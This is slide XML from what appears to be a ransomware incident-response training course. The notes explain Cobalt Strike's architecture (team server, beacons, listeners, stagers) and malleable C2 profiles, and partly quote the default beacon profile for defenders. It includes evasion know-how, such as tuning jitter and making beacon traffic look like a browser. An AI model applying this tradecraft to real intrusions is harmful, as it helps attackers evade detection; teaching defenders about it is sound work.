              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stroz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Friedberg’s “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cobaltstrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-config-extractor”: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cobaltstrikeextractor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Elastic has an integration for this tool, which you can find here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cobaltstrikeextractor-elastic</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Sentinel One’s “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CobaltStrikeParser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cobaltstrikeparser</a:t>
            </a:r>
          </a:p>
          <a:p>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Didier Stevens’ “1768.py” parser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/1768</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Te</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-K’s parser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cs-tek</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Avast’s “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cobaltstrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Tools &amp; Yara Rules”: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cs-avast</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3258770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dirty="0"/>
              <a:t>Cobalt Strike is a fantastic adversary simulation and red team operations toolkit. The tool’s author, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mudge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, developed a phenomenal tool that not only does its job well, but even more so has become the gold standard of tools in this category.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfortunately, ransomware operators and affiliates have claimed the tool as their own. We see CS used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>at least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>half the ransomware cases that we work as consulting groups. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Our goal is not to train you to use CS from A-Z, let alone make you a power user. Rather, we aim to describe just enough of the tool to you and provide enough resources such that you can deal with the threat when you run across it in your ransomware incident(s).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Because chances are, you will see it. And if you are not familiar with it, you would suffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, let’s get going and familiarize you with the general concepts associated with the tool and then jump into a hands-on lab (Lab 3.1) in which you deobfuscate various CS loaders to see how the payloads contained within are configured. This way, when you do run across CS within an engagement, we’ll be prepared!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a note, we are starting to see another post exploit framework being used either alongside or as an alternative: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BruteRatel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> C4. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242340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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>While it may be tightly regulated within the industry, there are cracked versions of cobalt strike all over the place. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>These cracked versions are all over the dark web, and they're trying to do their best job to get them off of the non dark web. But you'll see that in this particular post, there was someone that was asking about buying Cobalt Strike and someone responded, by pointing them towards tons of cracks files and plugins and toolkits.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233426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200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There were multiple leaks of the actual source code. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Unfortunately, Cobalt Strike was added to GitHub. Obviously, it was removed from GitHub, so you'll notice that now you'll see DMC takedowns for these things, but I wanted to show the threat actors like Cobalt Strike so much that they can’t stop talking about it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599030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charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>This illustration depicts the CS architecture and the layout. This is a client server architecture. They use what is called a team server (TS) at the heart of everything. The Team Server or TS is the primary C2 server, so when you hear people refer to cobalt strike’s C2 what they are referring to is the Team Server. The java-based TS can be installed anywhere (Windows or Linux) but you will see most TAs will install it on a Linux machine, and it provides the ability then for a client which is just called “the TS client” (also Java based) to connect to the Team Server. Clients will run on a multitude of operating systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>When you connect to the TS, you can be assigned a username and a password and it even includes reporting and built in capabilities. The nature of it being a Team Server means that it can track various activities by the different clients who have connected to the TS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The beacons, as they're called, are what are deployed to the devices that are then going to be controlled by Cobalt strike. Cobalt Strike beacons are usually what you will find in your victim environment. It's the same concept, as the Meterpreter. The Meterpreter connects back to what's known as a handler, .and in cobalt strike they connect to a listener, which Is just a handler.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>You can find the most recent version of the Cobalt Strike manual, a massive document outlining all system features in detail, at the following link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>https://for528.com/cs-guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844757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dirty="0"/>
              <a:t>Beacons connect to Listeners. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you create a listener you can choose the protocol type, most commonly HTTP and HTTPS. You can change the ports, but often they aren’t changed so that they blend in with your environment. You have the ability to create different attack packages, like HTA or MS Office Macros, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The payload generator allows you to create payloads, and from the available payload types, ransomware actors will often use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This is a one-liner to create a Beacon stager.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They may often choose a Windows executable as a stager which creates an exe or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which they can send into your victim environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The beacons can be staged or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stageless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. A staged beacon loader is just enough code to reach out the the TS to request and receive a full beacon for download and run in memory. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stageless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> beacon means the .exe file is the entire beacon itself, which has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> location identified in its config and it uses process injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to launch whatever the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process to launch the Microsoft app and resume the thread. It is becoming more common to see these 64 bit files used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PS command based loaders are also common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alyssa Rahman with Mandiant wrote a wonderful blog article entitled “Defining Cobalt Strike Components So You Can BEA-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CONfident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Your Analysis” that details the various components of Cobalt Strike. You can read Alyssa’s article here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/cs-components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68609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Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The concept behind malleable C2 profiles means you can make your C2 look like legitimate things in your environment. You go into the environment, whether it's a packet capture or whether you're just doing enough enumeration to find out exactly what browsers they use, and make your C2 look just like one of the their browsers itself and then you set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> to the actual browser they use and maybe the beacon itself running in memory will look just like their browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Some of the things you will find in the profiles include features like jitter, which is a deviation in the callback times the beacon uses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Sleeptime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> is how many seconds you sleep and pause between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>communcations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> up to the C2 server. The jitter will help your beacons avoid detection. You can set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>useragent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> options, and named pipes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>CS Default Profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The default profile values for Cobalt Strike 4.5 intend to be “noisy” on purpose. The following is the default profile for this version of Cobalt Strike.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following profile does not designate a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” process. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" dirty="0"/>
              <a:t>The default process, if not defined, is rundll32.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># default sleep time is 60s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sleeptime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "60000";</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jitter factor 0-99% [randomize callback times]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set jitter    "0";</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indicate that this is the default Beacon profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sample_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Cobalt Strike Beacon (Default)";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this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stage {</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stomppe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
